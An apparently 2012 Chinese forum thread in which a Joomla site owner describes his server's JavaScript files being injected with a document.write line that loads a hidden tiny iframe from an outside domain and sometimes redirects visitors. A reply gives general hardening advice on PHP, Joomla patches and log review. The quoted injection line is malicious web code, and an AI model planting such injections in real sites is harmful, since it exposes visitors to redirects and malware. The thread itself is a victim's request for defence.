作者 主題: js(joomla cms)站点页面被注入篡改,如何防范  (閱讀 3273 次)

0 會員 與 1 訪客 正在閱讀本文。

jeffreyguo

  • 違規-不可貼文
  • 憂鬱的高中生
  • *
  • 文章數: 105
  • 性別: 男
    • 檢視個人資料
    • 六艺网络
一个月前发现自己的服务器上所有站点(8个站点),在打开页面时总是加载一个国外连接。并且,在页面的最上方多出一个横条,使用浏览器的“查看元素”功能查看此横条,发现源代码中多了一部分:translatestrengths.org/usisec?8" align="middle" frameborder="no" height="5" scrolling="auto" width="5">

通过在服务器源文件内进行关键字搜索,发现所有.js文件内都会多这出一行代码

document.write('translatestrengths.org/usisec?8" scrolling="auto" frameborder="no" align="center" height="5" width="5">');
而且translatestrengths.org还随时间会变化成其他网站。

最严重时,网站打开后直接跳转到国外网站。

因此我断定,网站文件被注入了。漏洞及解决方法至今未找到。无奈只能将老的备份迁移到新的服务器上进行恢复。请问各位有何避免或修复此问题的解决方法。

试问joomla如此不堪一击吗?如何防范呢?我怀疑可能是某个组件漏洞造成的全部感染,盼请高手指点!
http://www.eee-eee.com Joomla网站专业定制!

hikohan

  • 俺是博士!
  • *****
  • 文章數: 1288
    • 檢視個人資料
Re: js(joomla cms)站点页面被注入篡改,如何防范
« 回覆 #1 於: 2012-11-28 13:33 »
1. web server 有漏洞,尤其是php部分,檢查php.ini關閉非必要功能外掛,還有,
要定時注意php security report && upgrade.

2. 當然,也得注意 joomla 本身的 bug fix patch。

3. 定時閱讀網站 log 分析。
lifeIsFunWithPHP.